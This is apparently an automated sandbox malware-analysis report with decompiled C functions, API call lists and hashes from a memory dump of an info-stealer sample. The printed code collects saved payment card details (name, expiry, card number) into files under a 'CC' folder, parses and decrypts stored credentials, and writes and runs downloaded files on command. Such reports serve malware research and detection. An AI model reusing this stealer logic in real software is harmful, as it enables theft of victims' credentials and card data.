                                        0x29d99ff0
                                        0x29d99ff6
                                        0x29d99ffb
                                        0x29d9a00b
                                        0x29d9a018
                                        0x29d9a01d
                                        0x29d9a027
                                        0x29d9a02c
                                        0x29d9a02f
                                        0x29d9a034
                                        0x29d9a034
                                        0x29d9a039
                                        0x29d9a041
                                        0x29d9a042
                                        0x29d9a049
                                        0x29d9a04f
                                        0x29d9a052
                                        0x29d9a052
                                        0x29d9a05d
                                        0x29d9a061
                                        0x29d9a071
                                        0x29d9a084
                                        0x29d9a0a6
                                        0x29d9a0ac
                                        0x29d9a0c0
                                        0x29d9a0c6
                                        0x29d9a0cb
                                        0x29d9a2ea
                                        0x29d9a2f1
                                        0x29d9a2fa
                                        0x29d9a302
                                        0x29d9a303
                                        0x29d9a304
                                        0x29d9a312
                                        0x29d9a312
                                        0x29d9a0e3
                                        0x29d9a0e9
                                        0x29d9a0ee
                                        0x29d9a2ca
                                        0x29d9a2d1
                                        0x29d9a2e1
                                        0x00000000
                                        0x29d9a2e7
                                        0x29d9a107
                                        0x29d9a110
                                        0x29d9a116
                                        0x29d9a11c
                                        0x29d9a283
                                        0x29d9a284
                                        0x29d9a28a
                                        0x29d9a292
                                        0x29d9a2a0
                                        0x29d9a2a3
                                        0x29d9a2c5
                                        0x29d9a2a5
                                        0x29d9a2a5
                                        0x29d9a2a5
                                        0x29d9a294
                                        0x29d9a294
                                        0x29d9a294
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9a122
                                        0x29d9a122
                                        0x29d9a12b
                                        0x29d9a13c
                                        0x29d9a15c
                                        0x29d9a162
                                        0x29d9a16a
                                        0x29d9a176
                                        0x29d9a182
                                        0x29d9a18a
                                        0x29d9a196
                                        0x29d9a1a2
                                        0x29d9a1b0
                                        0x29d9a1bc
                                        0x29d9a1c8
                                        0x29d9a1e5
                                        0x29d9a209
                                        0x29d9a20e
                                        0x29d9a218
                                        0x29d9a21e
                                        0x29d9a220
                                        0x29d9a220
                                        0x29d9a224
                                        0x29d9a22a
                                        0x29d9a237
                                        0x29d9a23f
                                        0x29d9a240
                                        0x29d9a245
                                        0x29d9a245
                                        0x29d9a24e
                                        0x29d9a258
                                        0x29d9a25e
                                        0x29d9a264
                                        0x29d9a271
                                        0x29d9a277
                                        0x29d9a27a
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D99FF6
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A00B
                                        • _malloc.LIBCMT ref: 29D9A013
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9A020
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9A034
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9A049
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9A061
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A071
                                        • _memset.LIBCMT ref: 29D9A084
                                        • wsprintfA.USER32 ref: 29D9A0A6
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A0FA
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9A101
                                        • lstrcatA.KERNEL32(00000000,Name: ), ref: 29D9A162
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A16A
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A176
                                        • lstrcatA.KERNEL32(00000000,Month: ), ref: 29D9A182
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A18A
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A196
                                        • lstrcatA.KERNEL32(00000000,Year: ), ref: 29D9A1A2
                                        • lstrcatA.KERNEL32(00000000,?), ref: 29D9A1B0
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A1BC
                                        • lstrcatA.KERNEL32(00000000,Card: ), ref: 29D9A1C8
                                          • Part of subcall function 29D99510: _memset.LIBCMT ref: 29D9958B
                                          • Part of subcall function 29D99510: LocalAlloc.KERNEL32(00000040,-000000E1,D9555F04), ref: 29D995C5
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A224
                                        • lstrcatA.KERNEL32(00000000,29DCFC38), ref: 29D9A264
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9A284
                                        • DeleteFileA.KERNEL32(?), ref: 29D9A2F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap_memset$AllocFile__getptdwsprintf$AllocateCopyCountDeleteLocalProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$Card: $Month: $Name: $Year: $\CC\%s_%s.txt
                                        • API String ID: 3275372742-3189770857
                                        • Opcode ID: 0e44e0a542eeb70aa69ea202aac3776831337613a8513608ac95084b0b5295e3
                                        • Instruction ID: d0e45b418f2b1e588aeb9b9f40dd0a6a40384ba4372bfe8943ff0e7832270c74
                                        • Opcode Fuzzy Hash: 0e44e0a542eeb70aa69ea202aac3776831337613a8513608ac95084b0b5295e3
                                        • Instruction Fuzzy Hash: 8791A2B2941254ABD711ABA4DC88F9EB7B8FF58701F04819CF509D7240DA389A85DFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8F640 Relevance: 54.2, APIs: 36, Instructions: 241stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 93%
                                        			E29D8F640(CHAR* __ecx, void* __edi) {
				signed int _v8;
				char _v1012;
				char _v2012;
				char _v3012;
				char _v4012;
				char _v5012;
				char _v6012;
				char _v7012;
				char _v8012;
				char _v9012;
				intOrPtr _v9016;
				void* __ebx;
				void* __esi;
				signed int _t67;
				CHAR* _t81;
				CHAR* _t86;
				signed char _t119;
				signed char _t120;
				intOrPtr* _t122;
				intOrPtr* _t125;
				CHAR* _t136;
				char* _t151;
				char* _t152;
				CHAR* _t156;
				CHAR* _t158;
				intOrPtr _t169;
				void* _t170;
				CHAR* _t171;
				signed int _t172;
				void* _t173;
				void* _t182;
				char* _t183;
				char* _t185;

				_t170 = __edi;
				E29DBCDB0(0x2338);
				_t67 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t67 ^ _t172;
				_t171 = __ecx;
				E29DB5640( &_v4012, 0, 0x3e8);
				E29DB5640( &_v6012, 0, 0x3e8);
				E29DB5640( &_v7012, 0, 0x3e8);
				E29DB5640( &_v8012, 0, 0x3e8);
				E29DB5640( &_v9012, 0, 0x3e8);
				E29DB5640( &_v1012, 0, 0x3e8);
				E29DB5640( &_v3012, 0, 0x3e8);
				E29DB5640( &_v2012, 0, 0x3e8);
				E29DB5640( &_v5012, 0, 0x3e8);
				_t81 =  *0x29dd81f8; // 0x15a19f0
				_t182 = _t173 + 0x6c;
				lstrcatA( &_v4012, _t81);
				_t156 =  *0x29dd7d64; // 0x15a2160
				lstrcatA( &_v6012, _t156);
				_t136 =  *0x29dd8048; // 0x15a19a0
				lstrcatA( &_v7012, _t136);
				_t86 =  *0x29dd7a9c; // 0x15a1b20
				lstrcatA( &_v8012, _t86);
				_t158 =  *0x29dd7f3c; // 0x15a21d8
				lstrcatA( &_v9012, _t158);
				lstrcatA( &_v1012, _t171);
				lstrcatA( &_v1012, "\\");
				lstrcatA( &_v1012,  &_v6012);
				lstrcatA( &_v1012, "\\");
				lstrcatA( &_v1012,  &_v7012);
				lstrcatA( &_v1012, "\\");
				lstrcatA( &_v1012,  &_v8012);
				lstrcatA( &_v3012, _t171);
				lstrcatA( &_v3012, "\\");
				lstrcatA( &_v3012,  &_v6012);
				lstrcatA( &_v3012, "\\");
				lstrcatA( &_v3012,  &_v7012);
				lstrcatA( &_v2012, _t171);
				lstrcatA( &_v2012, "\\");
				lstrcatA( &_v2012,  &_v9012);
				lstrcatA( &_v2012, "\\");
				lstrcatA( &_v2012,  &_v8012);
				lstrcatA( &_v5012, _t171);
				lstrcatA( &_v5012, "\\");
				lstrcatA( &_v5012,  &_v9012);
				_t168 =  &_v1012;
				_t119 = GetFileAttributesA( &_v1012);
				if(_t119 != 0xffffffff && (_t119 & 0x00000010) == 0) {
					_t185 = _t182 - 0x1c;
					_t152 = _t185;
					_t125 =  &_v4012;
					 *((intOrPtr*)(_t152 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t152 + 0x10)) = 0;
					_t130 =  &_v3012;
					_v9016 = _t185;
					 *_t152 = 0;
					_t171 = _t125 + 1;
					do {
						_t168 =  *_t125;
						_t125 = _t125 + 1;
					} while (_t168 != 0);
					E29D892C0(_t152,  &_v4012, _t125 - _t171);
					E29D8F3E0( &_v3012);
					_t182 = _t185 + 0x1c;
				}
				_t120 = GetFileAttributesA( &_v2012);
				if(_t120 != 0xffffffff && (_t120 & 0x00000010) == 0) {
					_t183 = _t182 - 0x1c;
					_t151 = _t183;
					_t122 =  &_v4012;
					 *((intOrPtr*)(_t151 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t151 + 0x10)) = 0;
					_t130 =  &_v5012;
					_v9016 = _t183;
					 *_t151 = 0;
					_t171 = _t122 + 1;
					do {
						_t169 =  *_t122;
						_t122 = _t122 + 1;
					} while (_t169 != 0);
					_t168 =  &_v4012;
					E29D892C0(_t151,  &_v4012, _t122 - _t171);
					_t120 = E29D8F3E0( &_v5012);
				}
				return E29DADF46(_t120, _t130, _v8 ^ _t172, _t168, _t170, _t171);
			}




































                                        0x29d8f640
                                        0x29d8f648
                                        0x29d8f64d
                                        0x29d8f654
                                        0x29d8f667
                                        0x29d8f669
                                        0x29d8f67f
                                        0x29d8f695
                                        0x29d8f6ab
                                        0x29d8f6c1
                                        0x29d8f6d7
                                        0x29d8f6ed
                                        0x29d8f703
                                        0x29d8f719
                                        0x29d8f71e
                                        0x29d8f723
                                        0x29d8f72e
                                        0x29d8f734
                                        0x29d8f742
                                        0x29d8f748
                                        0x29d8f756
                                        0x29d8f75c
                                        0x29d8f769
                                        0x29d8f76f
                                        0x29d8f77d
                                        0x29d8f78b
                                        0x29d8f79d
                                        0x29d8f7b1
                                        0x29d8f7c3
                                        0x29d8f7d7
                                        0x29d8f7e9
                                        0x29d8f7fd
                                        0x29d8f80b
                                        0x29d8f81d
                                        0x29d8f831
                                        0x29d8f843
                                        0x29d8f857
                                        0x29d8f865
                                        0x29d8f877
                                        0x29d8f88b
                                        0x29d8f89d
                                        0x29d8f8b1
                                        0x29d8f8bf
                                        0x29d8f8d1
                                        0x29d8f8e5
                                        0x29d8f8eb
                                        0x29d8f8f2
                                        0x29d8f8fb
                                        0x29d8f901
                                        0x29d8f904
                                        0x29d8f906
                                        0x29d8f90c
                                        0x29d8f913
                                        0x29d8f91a
                                        0x29d8f920
                                        0x29d8f926
                                        0x29d8f929
                                        0x29d8f930
                                        0x29d8f930
                                        0x29d8f932
                                        0x29d8f933
                                        0x29d8f941
                                        0x29d8f946
                                        0x29d8f94b
                                        0x29d8f94b
                                        0x29d8f955
                                        0x29d8f95e
                                        0x29d8f964
                                        0x29d8f967
                                        0x29d8f969
                                        0x29d8f96f
                                        0x29d8f976
                                        0x29d8f97d
                                        0x29d8f983
                                        0x29d8f989
                                        0x29d8f98c
                                        0x29d8f990
                                        0x29d8f990
                                        0x29d8f992
                                        0x29d8f993
                                        0x29d8f99a
                                        0x29d8f9a1
                                        0x29d8f9a6
                                        0x29d8f9ab
                                        0x29d8f9bd

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$AttributesFile
                                        • String ID:
                                        • API String ID: 1561027885-0
                                        • Opcode ID: 9c913ce21dc83106526fc79daef690ccbd6cf28ce4848170c5f284e7a12b4ebc
                                        • Instruction ID: 8ddca2dfa445ecb5fa582cf7aef29bb60dd86b0cfa1d20fd5147e07d4077d288
                                        • Opcode Fuzzy Hash: 9c913ce21dc83106526fc79daef690ccbd6cf28ce4848170c5f284e7a12b4ebc
                                        • Instruction Fuzzy Hash: 609173B6C40259ABC715EF60DC88FEE7778FB18700F44859CF109A6481EB7897499FA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9AA10 Relevance: 49.7, APIs: 33, Instructions: 192stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 89%
                                        			E29D9AA10(CHAR* __ecx, CHAR* __esi, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* _v272;
				CHAR* _v276;
				char* _v280;
				long _v284;
				void* __ebx;
				void* __edi;
				signed int _t26;
				void* _t41;
				char* _t43;
				char* _t47;
				CHAR* _t53;
				char* _t57;
				char* _t59;
				char* _t60;
				char* _t65;
				CHAR* _t66;
				int _t67;
				char* _t68;
				char* _t73;
				void* _t75;
				void* _t76;
				CHAR* _t77;
				CHAR* _t84;
				CHAR* _t87;
				char* _t88;
				CHAR* _t89;
				char* _t91;
				CHAR* _t95;
				CHAR* _t97;
				char* _t98;
				CHAR* _t99;
				long _t100;
				char* _t101;
				char* _t104;
				char* _t107;
				CHAR* _t109;
				signed int _t110;

				_t109 = __esi;
				_t26 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t26 ^ _t110;
				_push(0x29dd8300);
				_v276 = _a4;
				_t99 = __ecx;
				if(E29DAEC33() < 0x20) {
					_push(_t75);
					E29DB5640( &_v268, 0, 0x104);
					lstrcatA( &_v268, _t99);
					lstrcatA( &_v268, "\\");
					_t84 =  *0x29dd82d0; // 0x15a1e00
					_t93 =  &_v268;
					lstrcatA( &_v268, _t84);
					_t76 = CreateFileA( &_v268, 0x80000000, 1, 0, 3, 0, 0);
					_v272 = _t76;
					_t116 = _t76;
					if(_t76 != 0) {
						SetFilePointer(_t76, 0, 0, 2);
						_t100 = GetFileSize(_t76, 0);
						SetFilePointer(_t76, 0, 0, 0);
						_t10 = _t100 + 1; // 0x1
						_t41 = E29DAD4FB(_t76,  &_v268, _t100, __esi, _t116, _t10);
						_t93 =  &_v284;
						_v280 = _t41;
						ReadFile(_t76, _t41, _t100,  &_v284, 0);
						_t43 =  *0x29dd7bb4; // 0x15a1e30
						_t99 = StrStrA(_v280, _t43);
						if(_t99 != 0) {
							do {
								_t95 =  *0x29dd7bb4; // 0x15a1e30
								_t15 = lstrlenA(_t95) + 3; // 0x3
								_t77 =  &(_t99[_t15]);
								_t47 =  *0x29dd7e28; // 0x15a1f80
								_t101 = StrStrA(_t77, _t47);
								 *((char*)(_t101 - 3)) = 0;
								lstrcatA(__esi, "\n");
								_t87 =  *0x29dd7ed8; // 0x15a1a00
								lstrcatA(__esi, _t87);
								lstrcatA(__esi, _v276);
								lstrcatA(__esi, "\n");
								_t53 =  *0x29dd81e0; // 0x15a1a10
								lstrcatA(__esi, _t53);
								lstrcatA(__esi, _t77);
								lstrcatA(__esi, "\n");
								_t88 =  *0x29dd8074; // 0x159cd50
								_t57 = StrStrA(_t101 + 0xfffffffe, _t88);
								_t97 =  *0x29dd8074; // 0x159cd50
								_t19 = lstrlenA(_t97) + 3; // 0x3
								_t59 =  *0x29dd8070; // 0x159cd30
								_t60 = StrStrA( &(_t57[_t19]), _t59);
								_t89 =  *0x29dd7c9c; // 0x15a1a20
								_t104 = _t60;
								 *((char*)(_t104 - 3)) = 0;
								lstrcatA(__esi, _t89);
								lstrcatA(__esi, E29D98FB0( &(_t57[_t19])));
								lstrcatA(__esi, "\n");
								_t98 =  *0x29dd8070; // 0x159cd30
								_t65 = StrStrA( &(_t104[0xfffffffffffffffe]), _t98);
								_t66 =  *0x29dd8070; // 0x159cd30
								_t67 = lstrlenA(_t66);
								_t91 =  *0x29dd81f4; // 0x15a1c50
								_t22 = _t67 + 3; // 0x3
								_t68 = StrStrA( &(_t65[_t22]), _t91);
								_t93 =  *0x29dd819c; // 0x15a4b68
								_t107 = _t68;
								 *((char*)(_t107 - 3)) = 0;
								lstrcatA(__esi, _t93);
								lstrcatA(__esi, E29D98FB0( &(_t65[_t22])));
								lstrcatA(__esi, "\n\n");
								_t73 =  *0x29dd7bb4; // 0x15a1e30
								_t99 = StrStrA( &(_t107[0xfffffffffffffffe]), _t73);
							} while (_t99 != 0);
							_t76 = _v272;
						}
						CloseHandle(_t76);
					}
					_t29 =  *0x29dd834c();
					_pop(_t75);
				}
				return E29DADF46(_t29, _t75, _v8 ^ _t110, _t93, _t99, _t109);
			}










































                                        0x29d9aa10
                                        0x29d9aa19
                                        0x29d9aa20
                                        0x29d9aa27
                                        0x29d9aa2c
                                        0x29d9aa32
                                        0x29d9aa3f
                                        0x29d9aa45
                                        0x29d9aa54
                                        0x29d9aa64
                                        0x29d9aa76
                                        0x29d9aa7c
                                        0x29d9aa83
                                        0x29d9aa8a
                                        0x29d9aaac
                                        0x29d9aaae
                                        0x29d9aab4
                                        0x29d9aab6
                                        0x29d9aac3
                                        0x29d9aad9
                                        0x29d9aadb
                                        0x29d9aae1
                                        0x29d9aae5
                                        0x29d9aaef
                                        0x29d9aaf9
                                        0x29d9aaff
                                        0x29d9ab05
                                        0x29d9ab18
                                        0x29d9ab1c
                                        0x29d9ab22
                                        0x29d9ab22
                                        0x29d9ab2f
                                        0x29d9ab2f
                                        0x29d9ab33
                                        0x29d9ab45
                                        0x29d9ab48
                                        0x29d9ab4c
                                        0x29d9ab52
                                        0x29d9ab5a
                                        0x29d9ab68
                                        0x29d9ab74
                                        0x29d9ab7a
                                        0x29d9ab81
                                        0x29d9ab89
                                        0x29d9ab95
                                        0x29d9ab9b
                                        0x29d9aba6
                                        0x29d9abac
                                        0x29d9abbb
                                        0x29d9abbf
                                        0x29d9abc6
                                        0x29d9abcc
                                        0x29d9abd3
                                        0x29d9abd6
                                        0x29d9abda
                                        0x29d9abe9
                                        0x29d9abf5
                                        0x29d9abfb
                                        0x29d9ac06
                                        0x29d9ac0e
                                        0x29d9ac14
                                        0x29d9ac1a
                                        0x29d9ac20
                                        0x29d9ac26
                                        0x29d9ac2c
                                        0x29d9ac32
                                        0x29d9ac35
                                        0x29d9ac3a
                                        0x29d9ac49
                                        0x29d9ac55
                                        0x29d9ac5b
                                        0x29d9ac6b
                                        0x29d9ac6d
                                        0x29d9ac75
                                        0x29d9ac75
                                        0x29d9ac7c
                                        0x29d9ac7c
                                        0x29d9ac82
                                        0x29d9ac88
                                        0x29d9ac88
                                        0x29d9ac97

                                        APIs
                                        • _memset.LIBCMT ref: 29D9AA54
                                        • lstrcatA.KERNEL32(?,?,?,?,29DCD617,?), ref: 29D9AA64
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,?,29DCD617,?), ref: 29D9AA76
                                        • lstrcatA.KERNEL32(?,015A1E00,?,?,29DCD617,?), ref: 29D9AA8A
                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,29DCD617,?), ref: 29D9AAA6
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,29DCD617,?), ref: 29D9AAC3
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,29DCD617,?), ref: 29D9AACC
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,29DCD617,?), ref: 29D9AADB
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,29DCD617,?), ref: 29D9AAFF
                                        • StrStrA.SHLWAPI(?,015A1E30,?,?,?,29DCD617,?), ref: 29D9AB12
                                        • lstrlenA.KERNEL32(015A1E30,?,?,?,29DCD617,?), ref: 29D9AB29
                                        • StrStrA.SHLWAPI(00000003,015A1F80,?,?,?,29DCD617,?), ref: 29D9AB3A
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,29DCD617,?), ref: 29D9AB4C
                                        • lstrcatA.KERNEL32(?,015A1A00,?,?,?,29DCD617,?), ref: 29D9AB5A
                                        • lstrcatA.KERNEL32(?,?,?,?,?,29DCD617,?), ref: 29D9AB68
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,29DCD617,?), ref: 29D9AB74
                                        • lstrcatA.KERNEL32(?,015A1A10,?,?,?,29DCD617,?), ref: 29D9AB81
                                        • lstrcatA.KERNEL32(?,00000003,?,?,?,29DCD617,?), ref: 29D9AB89
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,29DCD617,?), ref: 29D9AB95
                                        • StrStrA.SHLWAPI(-000000FE,0159CD50,?,?,?,29DCD617,?), ref: 29D9ABA6
                                        • lstrlenA.KERNEL32(0159CD50,?,?,?,29DCD617,?), ref: 29D9ABB5
                                        • StrStrA.SHLWAPI(00000003,0159CD30,?,?,?,29DCD617,?), ref: 29D9ABC6
                                        • lstrcatA.KERNEL32(?,015A1A20,?,?,?,29DCD617,?), ref: 29D9ABDA
                                          • Part of subcall function 29D98FB0: _memset.LIBCMT ref: 29D98FE8
                                          • Part of subcall function 29D98FB0: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,29D9ABE7,?,?,?,29DCD617,?), ref: 29D99005
                                          • Part of subcall function 29D98FB0: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 29D9900D
                                          • Part of subcall function 29D98FB0: _memmove.LIBCMT ref: 29D99098
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,29DCD617,?), ref: 29D9ABE9
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,29DCD617,?), ref: 29D9ABF5
                                        • StrStrA.SHLWAPI(-000000FE,0159CD30,?,?,?,29DCD617,?), ref: 29D9AC06
                                        • lstrlenA.KERNEL32(0159CD30,?,?,?,29DCD617,?), ref: 29D9AC14
                                        • StrStrA.SHLWAPI(00000003,015A1C50,?,?,?,29DCD617,?), ref: 29D9AC26
                                        • lstrcatA.KERNEL32(?,015A4B68,?,?,?,29DCD617,?), ref: 29D9AC3A
                                          • Part of subcall function 29D98FB0: lstrcatA.KERNEL32(29DCD617,29DCD617,?,00000000,00000000,?,?,29D9ABE7,?,?,?,29DCD617,?), ref: 29D990D5
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,29DCD617,?), ref: 29D9AC49
                                        • lstrcatA.KERNEL32(?,29DCFC38,?,?,?,29DCD617,?), ref: 29D9AC55
                                        • StrStrA.SHLWAPI(-000000FE,015A1E30,?,?,?,29DCD617,?), ref: 29D9AC65
                                        • CloseHandle.KERNEL32(00000000,?,?,?,29DCD617,?), ref: 29D9AC7C
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$lstrlen$Pointer_memset$BinaryCloseCreateCryptHandleReadSizeString_memmove
                                        • String ID:
                                        • API String ID: 1742400647-0
                                        • Opcode ID: 4d27a1e07593b5ddd3e754c20b3df7856cd19839b214721b827863a44a71ff02
                                        • Instruction ID: ddf9203df58b61508b8dbeffd3658e4a4d016f776cde4949c0036aeda2d37d23
                                        • Opcode Fuzzy Hash: 4d27a1e07593b5ddd3e754c20b3df7856cd19839b214721b827863a44a71ff02
                                        • Instruction Fuzzy Hash: 01614F77581244AFD312BBA4EC88FAA7779BF59B01F148248F606D3240DF789946EB70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8EA30 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 208stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 60%
                                        			E29D8EA30(char _a4, intOrPtr _a24) {
				char _v8;
				char _v16;
				signed int _v24;
				char _v1019;
				char _v1020;
				char _v1021;
				char _v1022;
				char _v1023;
				char _v1024;
				char _v2024;
				char _v3024;
				char _v3028;
				char _v3032;
				intOrPtr _v3036;
				char _v3064;
				intOrPtr _v3068;
				char _v3072;
				intOrPtr _v3076;
				CHAR* _v3080;
				char* _v3084;
				char _v3088;
				char _v3092;
				char _v3096;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t63;
				char* _t67;
				char _t77;
				CHAR* _t78;
				signed int _t83;
				CHAR* _t87;
				void* _t100;
				void* _t101;
				char _t102;
				char* _t119;
				void* _t130;
				CHAR* _t131;
				void* _t132;
				void* _t134;
				CHAR* _t135;
				signed int _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				void* _t143;
				void* _t145;
				void* _t147;
				char* _t151;

				_push(0xffffffff);
				_push(E29DC1F48);
				_push( *[fs:0x0]);
				_t62 =  *0x29dd5664; // 0xd9555f04
				_t63 = _t62 ^ _t136;
				_v24 = _t63;
				_push(_t100);
				_push(0);
				_push(_t130);
				_push(_t63);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				 *0x29dd86ec = 1;
				E29DB5640( &_v2024, 0, 0x3e8);
				_t67 = _a4;
				_t139 = _t137 - 0xc08 + 0xc;
				_v3028 = 0x3b;
				if(_a24 < 0x10) {
					_t67 =  &_a4;
				}
				_t121 =  &_v3032;
				_t131 = E29DAEA8E(_t100,  &_v3032, _t130, _t67,  &_v3028,  &_v3032);
				_t140 = _t139 + 0xc;
				while(_t131 != 0) {
					if(lstrlenA(_t131) > 5) {
						E29DB5640( &_v1024, 0, 0x3e8);
						E29DB5640( &_v3024, 0, 0x3e8);
						_t143 = _t140 + 0x18;
						if(lstrlenA(_t131) >= 0) {
							_v1024 =  *_t131 & 0x000000ff;
							_v1023 = _t131[1] & 0x000000ff;
							_v1022 = _t131[2];
							_v1021 = _t131[3] & 0x000000ff;
							_v1020 = _t131[4] & 0x000000ff;
							_v1019 = 0;
						} else {
							_v1024 = 0;
						}
						_t24 =  &(_t131[5]); // 0x5
						 *0x29dd85cc( &_v3024, _t24);
						_t77 =  *0x29dd8550( &_v1024, "open_");
						if(_t77 != 0) {
							_t78 =  *0x29dd8098; // 0x15a1f98
							lstrcatA( &_v2024, _t78);
							_t135 = E29DADFE0( &_v1024, _t131, 0, 0x14);
							 *_t135 = 0;
							E29DAFCE4(GetTickCount());
							_t145 = _t143 + 8;
							_t102 = 0x14;
							do {
								_t83 = E29DAFCF6(__eflags);
								asm("cdq");
								_push(_t83 % 0xa);
								_push(_t135);
								wsprintfA(_t135, "%s%d");
								_t145 = _t145 + 0x10;
								_t102 = _t102 - 1;
								__eflags = _t102;
							} while (__eflags != 0);
							_t135[0x14] = _t102;
							lstrcatA( &_v2024, _t135);
							_t87 =  *0x29dd7ecc; // 0x15a1ad0
							lstrcatA( &_v2024, _t87);
							E29D97E40(_t131,  &_v2024);
							__eflags = 0;
							E29DB5640( &_v3096, 0, 0x3c);
							_t147 = _t145 + 0x10;
							_v3096 = 0x3c;
							_v3092 = 0;
							_v3088 = 0;
							_v3084 = "open";
							_v3080 =  &_v2024;
							_v3076 = 0x29dcd617;
							_v3072 = 0;
							_v3068 = 5;
							_v3064 = 0;
							 *0x29dd8584( &_v3096);
						} else {
							_t151 = _t143 - 0x1c;
							_t119 = _t151;
							_v3036 = _t151;
							 *((intOrPtr*)(_t119 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t119 + 0x10)) = _t77;
							 *_t119 = _t77;
							E29D892C0(_t119, 0x29dcd617, _t77);
							E29D986A0( &_v3024);
							_t147 = _t151 + 0x1c;
						}
						E29DB5640( &_v2024, 0, 0x3e8);
						E29DB5640( &_v1024, 0, 0x3e8);
						_t121 =  &_v3024;
						E29DB5640( &_v3024, 0, 0x3e8);
						_t68 = E29DAEA8E(_t102,  &_v3024, _t131, 0,  &_v3028,  &_v3032);
						_t140 = _t147 + 0x30;
						_t131 = _t68;
					}
				}
				 *0x29dd86f4 = 1;
				if(_a24 >= 0x10) {
					_t121 = _a4;
					_push(_a4);
					_t68 = E29DADF3B();
				}
				 *[fs:0x0] = _v16;
				_pop(_t132);
				_pop(_t134);
				_pop(_t101);
				return E29DADF46(_t68, _t101, _v24 ^ _t136, _t121, _t132, _t134);
			}





















































                                        0x29d8ea33
                                        0x29d8ea35
                                        0x29d8ea40
                                        0x29d8ea47
                                        0x29d8ea4c
                                        0x29d8ea4e
                                        0x29d8ea51
                                        0x29d8ea52
                                        0x29d8ea53
                                        0x29d8ea54
                                        0x29d8ea58
                                        0x29d8ea6b
                                        0x29d8ea73
                                        0x29d8ea7d
                                        0x29d8ea82
                                        0x29d8ea85
                                        0x29d8ea91
                                        0x29d8ea98
                                        0x29d8ea9a
                                        0x29d8ea9a
                                        0x29d8ea9d
                                        0x29d8eab1
                                        0x29d8eab3
                                        0x29d8eab8
                                        0x29d8eaca
                                        0x29d8eade
                                        0x29d8eaf4
                                        0x29d8eaf9
                                        0x29d8eb05
                                        0x29d8eb13
                                        0x29d8eb1d
                                        0x29d8eb26
                                        0x29d8eb30
                                        0x29d8eb3a
                                        0x29d8eb40
                                        0x29d8eb07
                                        0x29d8eb07
                                        0x29d8eb07
                                        0x29d8eb47
                                        0x29d8eb52
                                        0x29d8eb64
                                        0x29d8eb6c
                                        0x29d8eba3
